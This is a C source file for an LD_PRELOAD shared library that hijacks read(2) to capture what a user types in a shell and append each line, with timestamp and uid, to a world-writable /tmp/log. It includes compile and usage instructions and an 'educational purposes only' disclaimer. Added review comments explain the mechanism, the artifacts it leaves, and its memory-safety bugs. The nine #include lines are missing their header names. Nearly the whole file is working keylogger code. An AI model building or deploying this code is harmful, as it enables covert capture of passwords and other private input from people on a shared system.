/*
 * dirty shared hijacking read(2) :-)
 *
 * COMPILE
 * gcc -Wall -ldl -lc -fPIC -shared -o myread2.so myread2.c
 *
 * SUMMARY
 * the main idea is logging all what you type,
 * capturing syscall read(2) with ld.so(8)
 *
 * USE
 * $ LD_PRELOAD=./myread.so bash
 *
 * DISCLAIMER
 * for educational purposes only
 *
 * AUTHOR
 * Alejandro Gramajo ( agramajo at gmail dot com )
 * 20050330
 *
 */

/*
 * Review notes (what the listing does and what it leaves behind):
 *
 * - The shared object defines its own read(). When it is preloaded, the
 *   host process's calls to read() land in this file first; the real
 *   function is then looked up with dlsym() and called, and the caller's
 *   buffer is copied into a log on the way back.
 * - Artifacts visible in this file: the LD_PRELOAD setting shown under USE,
 *   and a text log at FILELOG ("/tmp/log") opened in append mode after
 *   umask(000), so a newly created log is readable and writable by every
 *   local user. A preloaded object is also visible in the process's
 *   environment and memory map (e.g. /proc/<pid>/environ, /proc/<pid>/maps).
 * - The umask change is never restored, so it also affects every file the
 *   host process creates afterwards.
 * - Memory-safety defects are noted inline (unbounded write into `line`,
 *   unchecked fopen()/dlsym() results); they can crash the host process.
 *
 * NOTE(review): the header names after each #include are missing from this
 * copy of the file (nine bare directives). They are kept exactly as found.
 * COMPILE builds "myread2.so" while USE preloads "myread.so"; the two names
 * disagree in the original text.
 */
#include
#include
#include
#include
#include
#include
#include
#include
#include

/* Handle passed to dlsym(); the value matches glibc's RTLD_NEXT
 * ("next definition after this object") -- presumably hard-coded to avoid
 * needing _GNU_SOURCE; confirm against the target libc. */
#define REAL_LIBC ((void *) -1L)
/* Path of the append-only log file. */
#define FILELOG "/tmp/log"
/* Capacity of the line buffer below, in bytes. */
#define MAX 256

/* Characters collected since the last newline. One buffer for the whole
 * process: input from every watched descriptor (and every thread) is mixed
 * into it, with no locking. */
static char line[MAX];
/* Number of bytes currently stored in `line`. */
static int size = 0;

/*
 * Write the current local time into `datetime` as "DD-MM HH:MM".
 *
 * datetime: caller-supplied buffer; strftime() is told it holds 12 bytes,
 *           which is exactly the 11 formatted characters plus the NUL.
 *
 * The localtime() result is passed to strftime() without a NULL check.
 */
void mytime (char *datetime) {
    struct tm *ptr;
    time_t tm;

    tm = time(NULL);
    ptr = localtime(&tm);
    strftime(datetime, 12, "%d-%m %H:%M", ptr);
}

/*
 * Record one byte of input and flush a log line when a newline arrives.
 *
 * buf:  buffer the caller of read() supplied; only buf[0] is examined.
 * blen: the size the caller asked read() for (see read() below). Anything
 *       other than 1 is ignored, so only byte-at-a-time readers are logged.
 *
 * The log file is opened and closed again on every call that gets past
 * the blen check.
 */
void logger (char *buf, size_t blen) {
    FILE *log1 = NULL;
    int uid;
    char now[12];

    if (blen == 1) {
        /* Process-wide and never restored: the log (and any file the host
         * process creates later) is created without umask restrictions. */
        umask(000);
        log1 = fopen(FILELOG,"a");
        /* NOTE(review): log1 is not checked. If fopen() fails, this call
         * and the fprintf/fflush/fclose below receive a NULL stream. */
        setbuffer(log1, NULL, 0);

        if ( *buf >= 0x20 && *buf <= 0x7E ) /* printable */
            /* NOTE(review): no bound check against MAX. A line of 256 or
             * more bytes without a newline writes past the end of `line`;
             * at exactly MAX bytes the NUL needed by "%s" is already gone. */
            line[size++] = *buf;
        else if ( *buf == 0x7F || *buf == 0x08 ) /* BS DEL */
            /* Erase keys are recorded as '!' instead of removing the
             * previous character (same missing bound check as above). */
            line[size++] = '!';
        else if ( *buf == 0x0A || *buf == 0x0D ) { /* \r \n */
            /* End of line: emit "[time uid] text" and reset the buffer. */
            uid = getuid();
            mytime(now);
            fprintf(log1, "[%s %d] %s\n", now, uid, line);
            size = 0;
            bzero(line, MAX);
        }
        /* Any other byte value falls through all three tests and is
         * dropped. */

        fflush(log1);
        fclose(log1);
    }
}

/*
 * Replacement for read(2) with the same signature.
 *
 * Looks up the next "read" definition with dlsym() on every call, forwards
 * the arguments to it, and on a positive return for descriptors 0, 3 or 4
 * hands the caller's buffer to logger(). Returns the forwarded result.
 *
 * NOTE(review): the dlsym() result is called without a NULL check, and the
 * ssize_t result is stored in an int before being returned.
 */
ssize_t read(int fd, void *buf, size_t count) {
    ssize_t (*o_read) (int, void *, size_t);
    int r;

    o_read = dlsym(REAL_LIBC, "read");
    r = o_read(fd, buf, count);

    if (r > 0)
        /* 0 == stdin */
        /* 4 == tty */
        /* Descriptor numbers are hard-coded; 3 is watched as well. */
        if (fd == 4 || fd == 3 || fd == 0)
            /* Passes the requested size `count`, not the number of bytes
             * actually read (`r`). */
            logger(buf, count);

    return r;
}